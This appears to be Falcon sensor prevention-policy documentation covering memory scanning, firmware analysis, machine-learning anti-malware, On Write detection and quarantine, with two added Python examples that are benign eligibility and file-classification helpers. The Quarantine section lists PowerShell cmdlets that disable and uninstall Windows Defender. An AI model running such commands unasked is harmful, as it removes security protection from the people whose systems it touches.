Enable the WSL 2 visibility prevention policy setting to gain high level visibility into Windows Subsystem for Linux 2 (WSL 2) Linux instances using the Falcon sensor WSL plug-in library.

Hardware-Enhanced Visibility category

Memory Scanning with GPU

Requirements:

  • Subscription: Falcon Insight XDR or Falcon Prevent

  • Sensor support: Falcon sensor for Windows 6.45 and later

  • System requirements:

    • Supported operating systems: Windows 10 version 1607 (RS1) and later

      Note: Windows Server 2016 and later are supported in configurations that meet processor and GPU requirements. This is uncommon in server hardware platforms.

    • Processor and architecture: Intel - 6th Generation Intel Core (SkyLake) processors or later with integrated GPU.

    • Integrated GPU: Integrated Intel Graphics, enabled in BIOS, and corresponding Intel Graphics drivers and DirectX 11 libraries installed. These libraries are typically installed by default.

    • Virtual hosts: Not supported. The setting will be disabled on virtual hosts.

Increase visibility into potential "executable-less" attacks, also known as "file-less" attacks, and traditional file-based attacks on your Windows hosts. This setting allows the sensor to perform memory scans that search for malicious artifacts in memory. Scans are triggered by certain observed behaviors and patterns.

An instance of CsFalconContainer.exe is added to hosts when the setting is enabled on them. When the setting is disabled, this process is deactivated.

For enhanced detection capability, also enable the Additional User Mode Data Visibility (AUMD) setting. Because memory scans on suspicious behaviors are triggered by micro behaviors, some might only be captured when this setting is enabled.

Identify supported endpoints

Gather a list of hosts that have been online within the last 7 days and meet the hardware, OS, and software requirements to support Memory Scanning.

Go to Investigate > Search > Advanced event search and run this query:

(#event_simpleName=SystemCapacity CpuVendor=0 CpuProcessorName=/Intel\(R\)\s+Core\(TM\)\s+i/i) OR (#event_simpleName=OsVersionInfo MajorVersion=10 BuildNumber>=14393) OR (#event_simpleName=DriverLoad FileName=/igd/i) | groupBy(aid, function=([count(#event_simpleName, distinct=true, as=eventCount), collect([CpuProcessorName, ProductName])])) | eventCount=3 | regex("Intel\(R\)\s+Core\(TM\)\s+(?<processorShortName>i\d+\-\S+)", field=CpuProcessorName, strict=false)

System performance safeguards

A number of safeguards help to ensure that CrowdStrike's memory scanning doesn't degrade system performance.

  • CrowdStrike has partnered with Intel Corporation to use state-of-the-art Accelerated Memory Scanning (AMS). AMS uses fine-tuned algorithms to search a large memory space in a highly performant way, offloading computation to an integrated Graphics Processing Unit (GPU) when one is available.

  • By using GPU offload, there is minimal impact on CPU usage during a memory scan.

  • Guardrails on memory scan iteration size and total memory size guard against runaway resource consumption.

As with all new prevention policies, the recommended best practice is to test this setting on a representative sample of hosts before enabling it widely across your organization.

Memory Scanning with CPU

Requirements:

  • Subscription: Falcon Insight or Falcon Prevent

  • Sensor support: Falcon sensor for Windows 6.47 and later

  • System requirements:

    • Supported operating systems:

      • Windows 8.1 and later

      • Windows Server 2012 R2 and later

    • Processor and architecture: All Intel processors (AMD not supported)

    • Virtual hosts: Supported

  • Default roles: Falcon Administrator configures prevention policies

  • CrowdStrike clouds: Available in US-1, US-2, and EU-1

Extend the capabilities provided by Memory Scanning with GPU to hosts that don't have integrated GPUs. Enable both settings to allow the sensor to perform memory scans that search for malicious artifacts in memory across even more of your Windows hosts and all Intel processors.

An instance of CsFalconContainer.exe is added to hosts when the setting is enabled on them. When the setting is disabled, this process is deactivated.

For enhanced detection capability, also enable the Additional User Mode Data Visibility (AUMD) setting. Because memory scans on suspicious behaviors are triggered by micro behaviors, some might only be captured when this setting is enabled.

Identify supported endpoints

Gather a list of hosts that have been online within the last 7 days and meet the hardware, OS, and software requirements to support CPU-Based Memory Scanning.

Go to Investigate > Search > Advanced event search and run this query:

event_platform=Win (#event_simpleName=SystemCapacity CpuVendor=0 CpuProcessorName=/Intel\(R\)/) OR (#event_simpleName=OsVersionInfo BuildNumber>=9600) | groupBy(aid, function=([count(#event_simpleName, distinct=true, as=eventCount), selectLast([CpuProcessorName, ProductName, AgentVersion])])) | eventCount=2 | CpuProcessorName=/^Intel\(R\)/ | drop(["eventCount"])
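
The two Advanced event search queries in this section and in Memory Scanning with GPU can be reproduced offline against exported events. The following Python is an added example, not CrowdStrike code; it assumes the SystemCapacity, OsVersionInfo and DriverLoad events were exported as dicts keyed by the field names the queries use, and the sample hosts, aids and hardware are constructed.

```python
"""Offline re-implementation of the two "Identify supported endpoints" queries on
this page (Memory Scanning with GPU and with CPU). Added example, not CrowdStrike
code: it assumes the SystemCapacity, OsVersionInfo and DriverLoad events were
exported as dicts keyed by the field names the queries use. The "online in the
last 7 days" condition is the search time range and is not modelled here."""
import re
from collections import defaultdict
from typing import Callable, Dict, Iterable, List

Event = Dict[str, object]

# Regular expressions taken from the page's queries.
INTEL_CORE_I = re.compile(r"Intel\(R\)\s+Core\(TM\)\s+i", re.IGNORECASE)
INTEL_PREFIX = re.compile(r"^Intel\(R\)")
SHORT_NAME = re.compile(r"Intel\(R\)\s+Core\(TM\)\s+(?P<processorShortName>i\d+\-\S+)")

def gpu_event_matches(ev: Event) -> bool:
    """GPU query filter: Intel Core i CPU, Windows 10 build 14393 (RS1) or later,
    and a loaded Intel graphics (igd*) driver."""
    kind = ev.get("event_simpleName")
    name = str(ev.get("CpuProcessorName", ""))
    if kind == "SystemCapacity":
        return ev.get("CpuVendor") == 0 and INTEL_CORE_I.search(name) is not None
    if kind == "OsVersionInfo":
        return ev.get("MajorVersion") == 10 and int(ev.get("BuildNumber", 0)) >= 14393
    if kind == "DriverLoad":
        return "igd" in str(ev.get("FileName", "")).lower()
    return False

def cpu_event_matches(ev: Event) -> bool:
    """CPU query filter: Windows host, Intel CPU, OS build 9600 (8.1 / 2012 R2) or later."""
    if ev.get("event_platform") != "Win":
        return False
    kind = ev.get("event_simpleName")
    if kind == "SystemCapacity":
        return ev.get("CpuVendor") == 0 and "Intel(R)" in str(ev.get("CpuProcessorName", ""))
    if kind == "OsVersionInfo":
        return int(ev.get("BuildNumber", 0)) >= 9600
    return False

def group_by_aid(events: Iterable[Event], keep: Callable[[Event], bool]) -> Dict[str, dict]:
    """groupBy(aid) with count(#event_simpleName, distinct=true) and selectLast()
    semantics: distinct event kinds are collected and the last value of a field wins."""
    hosts: Dict[str, dict] = defaultdict(lambda: {"kinds": set()})
    for ev in events:
        if not keep(ev):
            continue
        host = hosts[str(ev["aid"])]
        host["kinds"].add(ev["event_simpleName"])
        for field in ("CpuProcessorName", "ProductName", "AgentVersion"):
            if field in ev:
                host[field] = ev[field]
    return hosts

def gpu_eligible_hosts(events: Iterable[Event]) -> Dict[str, dict]:
    """Hosts with all three matching event kinds (eventCount=3); processorShortName is
    extracted like the query's regex(), and strict=false keeps rows with no match."""
    result = {}
    for aid, host in group_by_aid(events, gpu_event_matches).items():
        if len(host["kinds"]) != 3:
            continue
        match = SHORT_NAME.search(str(host.get("CpuProcessorName", "")))
        result[aid] = {"CpuProcessorName": host.get("CpuProcessorName"),
                       "ProductName": host.get("ProductName"),
                       "processorShortName": match.group("processorShortName") if match else None}
    return result

def cpu_eligible_hosts(events: Iterable[Event]) -> Dict[str, dict]:
    """Hosts with both matching event kinds (eventCount=2) whose last reported
    CpuProcessorName starts with "Intel(R)"."""
    result = {}
    for aid, host in group_by_aid(events, cpu_event_matches).items():
        if len(host["kinds"]) != 2 or not INTEL_PREFIX.match(str(host.get("CpuProcessorName", ""))):
            continue
        result[aid] = {f: host.get(f) for f in ("CpuProcessorName", "ProductName", "AgentVersion")}
    return result

def make_event(aid: str, kind: str, **fields: object) -> Event:
    # Builds one constructed Windows event for the sample export below.
    return {"aid": aid, "event_platform": "Win", "event_simpleName": kind, **fields}

# Constructed sample export (made-up aids and hosts, not real telemetry).
SAMPLE_EVENTS: List[Event] = [
    # Core i7 laptop with Intel iGPU on Windows 10 22H2: GPU and CPU scanning
    make_event("aaaa1111", "SystemCapacity", CpuVendor=0, CpuProcessorName="Intel(R) Core(TM) i7-8650U CPU @ 1.90GHz"),
    make_event("aaaa1111", "OsVersionInfo", MajorVersion=10, BuildNumber=19045, ProductName="Windows 10 Enterprise"),
    make_event("aaaa1111", "DriverLoad", FileName="igdkmd64.sys"),
    # Xeon server without integrated graphics: CPU scanning only
    make_event("bbbb2222", "SystemCapacity", CpuVendor=0, CpuProcessorName="Intel(R) Xeon(R) Gold 6230 CPU @ 2.10GHz"),
    make_event("bbbb2222", "OsVersionInfo", MajorVersion=10, BuildNumber=17763, ProductName="Windows Server 2019 Standard", AgentVersion="7.10.0"),
    # Core i5 desktop on Windows 8.1 (6.3 build 9600): too old for GPU scanning
    make_event("cccc3333", "SystemCapacity", CpuVendor=0, CpuProcessorName="Intel(R) Core(TM) i5-4590 CPU @ 3.30GHz"),
    make_event("cccc3333", "OsVersionInfo", MajorVersion=6, BuildNumber=9600, ProductName="Windows 8.1 Pro"),
    make_event("cccc3333", "DriverLoad", FileName="igdkmd64.sys"),
    # Non-Intel workstation (CpuVendor != 0 is a constructed stand-in): neither
    make_event("dddd4444", "SystemCapacity", CpuVendor=2, CpuProcessorName="AMD Ryzen 5 5600X 6-Core Processor"),
    make_event("dddd4444", "OsVersionInfo", MajorVersion=10, BuildNumber=22631, ProductName="Windows 11 Pro"),
]
```

The 7-day online window is the search's time range rather than part of the grouping logic, so apply it when you export the events.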

System performance safeguards

To help ensure that CrowdStrike's memory scanning doesn't degrade system performance, we minimize the impact on hosts by leveraging CPU Rate Limiting. This puts a 20 percent cap on the CPU that can be spent on memory scanning.

As with all new prevention policies, the recommended best practice is to test this setting on a representative sample of hosts before enabling it widely across your organization.

Firmware category

BIOS Firmware Deep Visibility

Requirements:

  • Subscription: Falcon Insight XDR

  • Supported platform: Windows

Important: This setting is inoperative on Windows ARM64-based hosts.

Enabling this setting activates the SPI Flash BIOS image analysis. It may result in a minor increase in boot time, but enables additional visibility into your BIOS image.

This setting enables the Falcon sensor to analyze the BIOS for compromised images and BIOS-related vulnerabilities. On reboot, the Falcon sensor analyzes certain platform configuration settings and reads the SPI flash to extract register data as well as the BIOS image on that host. In addition to reboots, the system configuration is re-analyzed when the host resumes from sleep or hibernation.

This setting slows down the system boot by about 4-7 seconds.

We recommend appropriate testing to monitor system startup performance before full deployment.

On Windows, this feature is enabled using a driver called CSFirmwareAnalysis.sys. In order to enable BIOS Image Verification on supported Dell Windows hosts, the BIOS Deep Visibility setting must be enabled and Dell Trusted Device Agent must be installed. For more info about installing Dell Trusted Device Agent, see Dell Trusted Device Product Support.

Windows Virtual Hosts (VMware / Citrix / Hyper-V) are considered as having Unsupported Processors, and therefore Security Configurations Checks, BIOS Prevalence Checks, and BIOS Integrity Checks aren't performed on virtual hosts.

Cloud Machine Learning category

The Cloud Machine Learning category includes both Cloud Anti-malware and Adware & PUP. Both feature separate level sliders for Detection (report only) and Prevention (takes action). The right side of the slider produces the most results but may include more false positives. We don't recommend using the Extra-Aggressive setting outside of PEN testing scenarios.

Cloud Machine Learning is a critical component in the detection and prevention of known, emerging, and zero-day malware and ransomware attacks.

Enable detection first at a level above that set for prevention. Triage detection data and allowlist false positives as appropriate by hash through IOC Management and/or by file/path through machine learning exclusion. When you are confident the majority of your applications have executed, increase the detection and prevention sliders one notch each and repeat triage and allowlisting. Repeat until you have reached the recommended settings.

Cloud machine learning doesn't conflict with traditional antivirus tools.

Cloud-Based Anti-Malware

Requirements:

  • Subscription: Falcon Insight XDR (detection only) or Falcon Prevent

  • Supported platforms: Windows, Mac, and Linux

Note: With Falcon for Linux on IBM zSystems, cloud machine learning is enabled but not beneficial because of the lack of a malware corpus for this platform.

This cloud-based machine learning setting covers file attribute analysis and file analysis. File attribute analysis aims to stop known malware that meets a specified certainty threshold. Instead of storing millions of known malware hashes on the client, CrowdStrike's Cloud antivirus (AV) feature provides real-time blocking against high-confidence known malware based on a combination of AV detection and file properties that are analyzed by the CrowdStrike cloud using machine learning. This protects against known malware without putting a significant burden on the client. Each process is queried in real-time against our Cloud AV service and is prevented from executing if it matches high-confidence, known malware.

File analysis involves stopping malware that has been statically analyzed and flagged as malicious using CrowdStrike's machine learning techniques. These techniques allow you to analyze files without executing them. It enables you to find new malware without the need for signatures and reliance on antivirus tools.

Cloud Anti-malware for Microsoft Office Files

Requirements:

  • Subscription: Falcon Insight XDR (detection only), Falcon Prevent
    Note: Falcon Insight XDR customers can detect malicious Microsoft Office macros. Falcon Prevent customers can detect and remediate malicious Microsoft Office macros.
  • Operating system: Windows

Use cloud machine learning (cloud ML) to identify when malicious macros in Microsoft Office files get written to disk. If prevention is enabled, Falcon performs one of these actions:

  • Quarantines the infected Office files.
  • Removes malicious macros from infected Office files and keeps their original file name and path.

The cloud ML-based Office file macro analysis only happens on file write.

To activate this feature for Falcon sensor for Windows version 7.33 and later:

  • Detections:
    • Enable Detection setting for Cloud anti-malware for Microsoft Office files.
  • Preventions:
    • Enable Prevention setting for Cloud anti-malware for Microsoft Office files.
    • Enable Quarantine & Security Center Registration.

To activate this feature for Falcon sensor for Windows versions 7.32 and earlier:

  • Detections:
    • Enable Detection setting for Cloud anti-malware for Microsoft Office files.
    • Enable Detect on write.
  • Preventions:
    • Enable Prevention setting for Cloud anti-malware for Microsoft Office files.
    • Enable Quarantine & Security Center Registration.
    • Enable Quarantine on write.

Note: The current cloud ML model does not detect XLM (Excel 4.0) macros, which are already disabled by default from Microsoft.

We recommend that you update your registry settings to disable Office macros by default, which will mitigate the risk of malicious macro execution.

Quarantined files appear on the Quarantined files page. You can enable Office macro detection without turning on prevention if you don’t want to quarantine or remove detected macros.

Note: Office files aren’t uploaded to the Falcon cloud. They won’t be available for download from the Quarantined Files dashboard, and won’t go to Sandbox for detonation.

The existing Laroux Malware Cleanup Tool can still be used to scan and clean pre-existing Laroux-based infections on endpoints. Newly written files containing Laroux are detected and prevented.

Microsoft Office File Malicious Macro Removal

Requirements:

  • Subscription: Falcon Insight XDR (detection only), Falcon Prevent

    Note: Falcon Insight XDR customers can detect malicious Microsoft Office macros. Falcon Prevent customers can detect and remediate malicious Microsoft Office macros.
  • Supported platform: Windows

Enable removal of malicious macros from infected Office files when detections are generated by either IOAs or cloud ML.

Note: The Malicious Macro Removal feature requires the Quarantine on Write Prevention policy toggle enabled in order to function.

Remediated Office files can be restored to their original form by undoing the action in the Remediation page. To avoid unintended data loss during a restore attempt, the sensor won’t overwrite an existing file with the same file name. You should move, rename, or delete the remediated file to clear the path before attempting the restore.

Cloud-Based Adware & PUP

Requirements:

  • Subscription: Falcon Insight XDR (detection only) or Falcon Prevent

  • Supported platforms: Windows and Mac

Cloud-Based Adware & PUP is identical in function to Cloud-Based Anti-Malware, but is focused on executables classified as Adware and/or as Potentially Unwanted Programs (PUPs). Adware and PUPs are often considered just a nuisance, but they can be used to install malicious files.

Sensor Machine Learning category

The Sensor Machine Learning category includes Sensor Anti-malware on all supported OS platforms, and Adware & PUP on macOS. They feature separate level sliders for Detection (report only) and Prevention (takes action). The right side of the slider produces the most results but may include more false positives. We don't recommend using the Extra-Aggressive setting outside of PEN testing scenarios.

Sensor Machine Learning is a critical component in the detection and prevention of known, emerging, and zero-day malware and ransomware attacks.

Enable detection first at a level above that set for prevention. Triage detection data and allowlist false positives as appropriate by hash through IOC Management and/or by file or path through machine learning exclusion. When you are confident the majority of your applications have executed, increase the detection and prevention sliders one notch each and repeat triage and allowlisting. Repeat until you have reached the recommended settings.

Sensor-Based Anti-Malware

Requirements:

  • Subscription: Falcon Insight XDR (detection only) or Falcon Prevent

  • Supported platforms: Windows, Mac, and Linux

Important: With Falcon for Linux on IBM zSystems, the Falcon sensor doesn’t support sensor anti-malware.

Provides machine learning-based on-sensor AV protection for malicious files, including offline protection.

Sensor ML has zero-day detection capabilities that traditional AV products cannot match, so we strongly recommend enabling Sensor ML Prevention as per our best practices.

Enhanced machine learning for larger files

Requirements:

  • Subscription: Falcon Insight XDR (detection only) or Falcon Prevent

  • Supported platform: Windows

Supports ML analysis of larger file sizes.

Note: ML analysis of larger files requires additional endpoint resources. Internal testing showed an increase in processing time of a few seconds for every 100MB in file size. This feature has been beta tested by a number of customers over the past few months with no reports of adverse effects. We recommend that you test this in your own environment before deploying broadly.

On Demand Scan is not supported by this enhancement. Only files detected on write or on execute are supported.

All existing allowlisting and exclusion tools which support ML-based detections also support this setting, including machine learning exclusion and IOC Management.

Sensor Adware & PUP

Requirements:

  • Subscription: Falcon Insight XDR (detection only) or Falcon Prevent

  • Supported platform: Mac

Sensor Adware and PUP is identical in function to Sensor-Based Anti-Malware, but is focused on executables classified as Adware and/or as Potentially Unwanted Programs (PUPs). Adware and PUPs are often considered just a nuisance, but they can be used to install malicious files.

On Write category

The sensor machine learning-based On Write prevention category supports detecting and quarantining files on write, which helps eliminate malware on your hosts before the malware can execute. Configure your prevention policies to have the Falcon sensor use machine learning to analyze suspicious portable executable (PE) files on Windows or Mach-O files, which includes dynamic library (DYLIB) files, on Mac when they're written to disk.

The On Write prevention policy category contains the Detect on Write, On Write Script Visibility, and Quarantine on Write settings. When Detect on Write is enabled, the Falcon sensor generates a detection when a malicious PE or Mach-O file is written to disk. When Quarantine on Write is enabled, the Falcon sensor quarantines these malicious files.

Important: To use the Quarantine on Write setting, you must enable the Quarantine & Security Center Registration setting (for Windows) or the Quarantine setting (for Mac) in your prevention policy’s Quarantine category.

The sensitivity of the On Write settings is tied to the level of the policy's Cloud-Based Anti-Malware and Sensor-Based Anti-Malware machine learning settings. These anti-malware settings determine how cautiously or aggressively files are considered to be malicious, whether known hashes that are analyzed by the CrowdStrike cloud or unknown hashes that are scanned by the sensor. These settings can affect the number of detections generated and files quarantined. For more info, see Cloud Machine Learning category and Sensor Machine Learning category.

Detect on Write detections are shown in Endpoint security > Monitor > Endpoint detections. On Write Script Visibility is available in Endpoint security > Prevention policies > On Write. Quarantine on Write quarantined file details are available in Endpoint security > Monitor > Quarantined files, where they can be downloaded or released from quarantine.

Hash-based custom IOCs and file- and path-based machine learning exclusions also apply to On Write detections. However, On Write settings don't support detecting on or quarantining blocklisted hash-based IOCs for any vendor-signed Windows or macOS binaries.

Important: Quarantining files on write on removable devices or network shares isn't supported for macOS.

Recommended best practices

  • Before enabling Quarantine on Write, enable Detect on Write and monitor detections for a sufficient amount of time for your applications to have executed. This facilitates detection triage and allowlisting of false positives.

  • Within Sensor Capabilities, enable the Unknown Detection-Related Executables and Unknown Executables settings in your prevention policies so that unknown PE and Mach-O files can be automatically uploaded to the CrowdStrike cloud. This helps improve machine learning performance, which helps reduce the false positive rates associated with novel files detected on write.

  • For best practices about configuring prevention policy settings, including Detect on Write settings, see Prevention Policy Best Practice Guidelines.

Detect on Write

Requirements:

  • Subscription: Falcon Insight XDR or Falcon Prevent

  • Supported platforms: Windows, Mac

    Due to a Microsoft NTFS bug that was fixed in later versions of Windows, the On Write settings aren't supported on, and are automatically disabled for, these operating systems:

    • Windows Server 2012

    • Windows Server 2012 R2

    • Windows 8.1

    • Windows 10 v1507 (Threshold 1)

    • Windows 10 v1511 (Threshold 2)

  • Sensor support:

    • Windows: Falcon sensor for Windows 6.33 and later

    • Mac: Falcon sensor for Mac 6.57 and later

Have the Falcon sensor report a detection when a suspicious PE or Mach-O file is written to disk, rather than waiting for it to execute.

On Write Script File Visibility

Requirements:

  • Subscription: Falcon Insight XDR or Falcon Prevent

  • Supported platforms: Windows, Linux

  • Sensor support:

    • Falcon sensor for Windows 6.53 and later

    • Falcon sensor for Linux 7.16.16903 and later

Note: Falcon sensor for Windows 6.53 detects Python script files only, while Falcon sensor for Windows 7.03 and later detects Python, .BAT, and .CMD files.

Note: For this to operate on Linux, the Filesystem Visibility prevention policy setting must be enabled. For more info, see Filesystem Visibility.

For Windows, this setting generates ScriptFileWrittenInfo event telemetry data when a detected (suspicious) script file is being written to disk.

For Linux, this setting generates ScriptControlDetectInfo event telemetry data when a detected (suspicious) script file has been written to disk.

Linux script file visibility includes:
  • Any file that starts with the character sequence #!
  • Any file with a known script extension, including:
    • .action
    • .asa
    • .ashx
    • .asmx
    • .asp*
    • .aspq
    • .awk
    • .axd
    • .bat
    • .cer
    • .cf*
    • .cgi
    • .config
    • .ctp
    • .dbm
    • .do
    • .groovy
    • .hphp
    • .htaccess
    • .inc
    • .js
    • .js*
    • .lua
    • .module
    • .phar
    • .php*
    • .pht
    • .pl
    • .ps1
    • .py
    • .rb
    • .rem
    • .sh
    • .soap
    • .swf
    • .vbs
    • .wss
    • .yaws
    • .*html

Note: Renaming an existing script file's extension will not trigger an On Write evaluation, but the script file is still examined on execute.
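
As an added example (not CrowdStrike's sensor code), the following Python classifies files by the Linux script file visibility scope listed above. Reading the entries that contain * as shell-style globs, checking only the first two bytes for #!, and the sample file names are this example's assumptions.

```python
"""Decide which files fall inside the scope of the Falcon sensor for Linux
On Write Script File Visibility rule described on this page: a file is in
scope if it starts with "#!" or carries one of the listed script extensions.

Added example, not CrowdStrike code. The extension list is transcribed from
the page; reading the entries that contain "*" as shell-style globs against
the lower-cased extension is this example's assumption, as is evaluating only
the first two bytes for the shebang check.
"""
import fnmatch
import os
from typing import Dict, Optional

SCRIPT_EXTENSIONS = (
    ".action", ".asa", ".ashx", ".asmx", ".asp*", ".aspq", ".awk", ".axd",
    ".bat", ".cer", ".cf*", ".cgi", ".config", ".ctp", ".dbm", ".do",
    ".groovy", ".hphp", ".htaccess", ".inc", ".js", ".js*", ".lua",
    ".module", ".phar", ".php*", ".pht", ".pl", ".ps1", ".py", ".rb",
    ".rem", ".sh", ".soap", ".swf", ".vbs", ".wss", ".yaws", ".*html",
)


def file_extension(filename: str) -> str:
    """Lower-cased extension; a lone dotfile such as .htaccess is its own extension."""
    base = os.path.basename(filename).lower()
    _, ext = os.path.splitext(base)
    if not ext and base.startswith("."):
        ext = base
    return ext


def matching_extension(filename: str) -> Optional[str]:
    """Return the list entry that matches the file's extension, else None."""
    ext = file_extension(filename)
    if not ext:
        return None
    for entry in SCRIPT_EXTENSIONS:
        if "*" in entry:
            if fnmatch.fnmatchcase(ext, entry):
                return entry
        elif ext == entry:
            return entry
    return None


def classify(filename: str, head: bytes) -> Optional[str]:
    """Why the file is in scope: "shebang", the matching extension entry, or None.
    The shebang rule is checked first, as the page lists it first."""
    if head.startswith(b"#!"):
        return "shebang"
    return matching_extension(filename)


def classify_path(path: str) -> Optional[str]:
    """Classify a real file by reading only its first two bytes."""
    with open(path, "rb") as fh:
        return classify(path, fh.read(2))


# Constructed sample files (name and first bytes), not taken from the page.
SAMPLE_FILES: Dict[str, bytes] = {
    "/tmp/deploy": b"#!/bin/sh\n",            # no extension, shebang -> in scope
    "/srv/www/index.xhtml": b"<!DOCTYPE",       # matches .*html
    "/srv/www/.htaccess": b"RewriteEngine",     # dotfile handled as its own extension
    "/srv/www/legacy.php5": b"<?php",           # matches .php*
    "/home/u/notes.txt": b"hello",              # out of scope
    "/home/u/backup.tar.gz": b"\x1f\x8b",       # out of scope
    "/opt/app/config.json": b"{}",              # matches .js* under the glob reading
    "/home/u/Tool.PS1": b"param(",              # extension comparison is case-insensitive
}


def scan_samples(samples: Dict[str, bytes] = SAMPLE_FILES) -> Dict[str, Optional[str]]:
    """Run the classifier over the constructed samples."""
    return {name: classify(name, head) for name, head in samples.items()}
```

Per the note above, this scope applies to files as they are written; a later rename of the extension is not re-evaluated on write.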

Quarantine on Write

Requirements:

  • Subscription: Falcon Prevent

  • Supported platforms: Windows, Mac

    Due to a Microsoft NTFS bug that was fixed in later versions of Windows, the On Write settings aren't supported on, and are automatically disabled for, these operating systems:

    • Windows Server 2012

    • Windows Server 2012 R2

    • Windows 8.1

    • Windows 10 v1507 (Threshold 1)

    • Windows 10 v1511 (Threshold 2)

  • Sensor support:

    • Windows: Falcon sensor for Windows 6.33 and later

    • Mac: Falcon sensor for Mac 6.57 and later

Quarantine files detected on write. In order to enable Quarantine on Write, Detect on Write must be enabled.

Quarantine category

Quarantine & Security Center Registration

Requirements:

  • Subscription: Falcon Prevent

  • Supported platform: Windows

Enable Quarantine & Security Center Registration on Windows and Quarantine on Mac to quarantine executable files after they are prevented by next-gen antivirus (NGAV).

Quarantine and traditional AV on-access scanning (OAS) should not be enabled simultaneously, as this can lead to race conditions, problems with Quarantine functions, and so on. If you enable Quarantine on either OS, we recommend setting NGAV Sensor Machine Learning Prevention to Moderate or higher and also disabling or removing other antivirus solutions.

If Quarantine & Security Center Registration is enabled, Falcon registers as AV with the Windows Security Center (WSC) on Windows workstations. This also automatically disables Windows Defender on Windows workstations.

Because Windows servers don't have the WSC, they function differently with regard to Windows Defender:

  • Server 2008 R2, 2012, 2012 R2: Defender is disabled (or not even installed) by default. If you previously installed or enabled it manually, then you must disable it manually after enabling Falcon NGAV.

  • Server 2016, 2019, and 2022: Defender is enabled by default. If you left it enabled in your configuration, then it must be disabled after enabling the Quarantine & Security Center Registration switch.

  • The following PowerShell cmdlet can be used to disable Defender real-time monitoring:

    • Set-MpPreference -DisableRealtimeMonitoring $true

  • The following PowerShell cmdlet can be used to uninstall Defender:

    • Uninstall-WindowsFeature -Name Windows-Defender

Defender doesn't have to be registered with the WSC (Workstations) and/or left enabled (Server 2016, 2019, 2022) to run On Demand Scans (ODS). Defender ODS can for example be run using GPO.

Preventions which can leverage the Quarantine function include:

  • Cloud and/or Sensor Machine Learning, file-based preventions - those where the Technique is either Cloud Based ML, Sensor Based ML, Adware, Adware/PUP, or PUP

  • Sensor Machine Learning, file-based preventions - those with Technique=Sensor Based ML

  • Custom Blocking-based preventions (blocklisting through IOC Management) – those with Tactic of Custom Intelligence and Technique of Indicator of Compromise

Quarantine

Requirements:

  • Subscription: Falcon Prevent or Next-Gen Antivirus available with Falcon Insight XDR

  • Supported platforms: Mac and Linux

Note: This setting doesn't generate detections or preventions.

Turn on this setting to quarantine executable files after they are prevented by NGAV. We recommend setting Cloud-Based Anti-Malware - Prevention levels to Moderate when Quarantine is enabled.

Quarantine on Removable Media

Requirements:

  • Subscription: Falcon Prevent

  • Supported platform: Windows

Quarantine files on removable media after they're prevented by Next-Gen Antivirus (NGAV). Toggles that set quarantine behavior are located in the Anti-malware Prevention levels section in Sensor Machine Learning and Cloud Machine Learning.

Note: Quarantine & Security Center Registration is required to enable quarantine on detect on execute and detect on write for USB-based files.

On-Demand Scans category

The On-Demand Scans category includes prevention policy settings for on-demand scans. These settings control behavior for scans that are initiated by end users on the local host and for scans that are triggered by USB device insertion on the local host.

For info about configuring scan-specific settings, see On-Demand Scanning.

On-Demand Scans Machine Learning

Falcon machine learning (ML) analyzes files for on-demand scanning in the same way that it analyzes files upon execution. However, for on-demand scanning, the analysis is done on demand instead of upon execution.

Falcon on-demand scanning leverages both Cloud Anti-malware and Sensor Anti-malware, providing both online and offline detection.

These settings control ML behavior for on-demand scans that are initiated by end users. These settings also determine whether quarantine is enabled for scans that are initiated by end users.

Requirements:

  • Subscription: Falcon Prevent

  • Supported platform: Windows

Sensor-based anti-malware on-demand scanning

For offline and online hosts that are running on-demand scans that were initiated by end users, apply sensor-based ML to identify and analyze unknown executables to detect and prevent malware. To disable file quarantining, set the Prevention slider to Disabled.

Cloud-based anti-malware on-demand scanning

For online hosts that are running on-demand scans that were initiated by end users, apply cloud-based ML that leverages global analysis of executables to detect and prevent malware. To disable file quarantining, set the Prevention slider to Disabled.

Cloud-based adware & PUP on-demand scanning

For online hosts that are running on-demand scans that were initiated by end users, apply cloud-based machine learning that leverages global analysis of executables to detect and prevent adware and potentially unwanted programs (PUP). To disable file quarantining, set the Prevention slider to Disabled.

On-Demand Scans

Requirements:

  • Subscription: Falcon Prevent

  • Supported platform: Windows

USB Insertion Triggered Scan

Automatically start a scan when an end user inserts a USB device. To adjust detection sensitivity, change detection levels in On-Demand Scans Machine Learning.

Execution Blocking category

The Execution Blocking prevention category contains Custom Blocking, Suspicious Processes, Suspicious PowerShell Scripts and Commands, Suspicious Registry Operations, Drift Prevention, and Intelligence-Sourced Threats, which complement Machine Learning preventions.

Custom Indicator Blocking

Requirements:

  • Subscription: Falcon Prevent or Falcon Insight XDR

  • Supported platforms: Windows, Mac, and Linux

Custom Indicator Blocking enables blocklisting by hash, using hashes you add to IOC Management with the action set to Block. This allows an organization to use prevention policies to define and maintain a hash-based blocklist of executables deemed undesirable or harmful. Blocking by hash will take precedence over other policies.

To avoid inadvertently blocking trusted processes or processes fundamental to running the OS when using Custom Indicator Blocking, sensors don't block certain processes that have been signed by Microsoft. For more information see Custom IOCs.

Your custom blocklist applies to your entire CID. You can enable or disable custom blocklists in separate policies, but all your policies share the same blocklist.

Suspicious Process Prevention

Requirements:

  • Subscription: Falcon Prevent

  • Supported platforms: Windows, Mac, and Linux

This setting blocks processes that exhibit suspicious behavior as defined by IOAs. The goal is to identify the intention of the process and block it if deemed malicious. For example, svchost.exe being launched by an unexpected process instead of services.exe is a likely indicator of malware execution.

This provides an additional level of protection in high-fidelity areas, such as PowerShell activity. As we continue to identify malicious activity that is impacting customers, we continuously update this prevention.

This setting is a core Behavioral IOA prevention setting, critical to preventing numerous threats including emerging and zero-day ones related to malware, ransomware, and credential theft.

Suspicious Script and Command Prevention

Requirements:

  • Subscription: Falcon Prevent

  • Supported platform: Windows

Important: For ARM64-based hosts running Windows 11, you must have Falcon sensor for Windows version 6.56 or later. This setting is not supported for ARM64-based hosts running Windows 10.

The Falcon sensor can block some malicious operations performed by scripts and shells, such as:

  • Contents of executed script files

  • Typed strings on a PowerShell prompt

  • Dynamically executed strings through the Invoke-Expression cmdlet

  • Commands supplied as a command-line parameter, such as -EncodedCommand

Important: On Windows 10, Windows 11, Server 2016, Server 2019, and Server 2022-based hosts, this setting also enables the prevention of malicious VBA macros in Microsoft Office products as well as malicious VBScript, JScript, and Excel 4.0 macros if Script-Based Execution Monitoring has also been enabled.

When related malicious content is prevented, PowerShell displays an error message on that particular command or script. The host process powershell.exe is not terminated and no pop-ups are displayed.

When related malicious content is prevented, Office displays an error message on that particular VBA macro. The host Office process is terminated and Office displays a pop-up.

This setting is critical to prevent script-based and PowerShell-based threats.

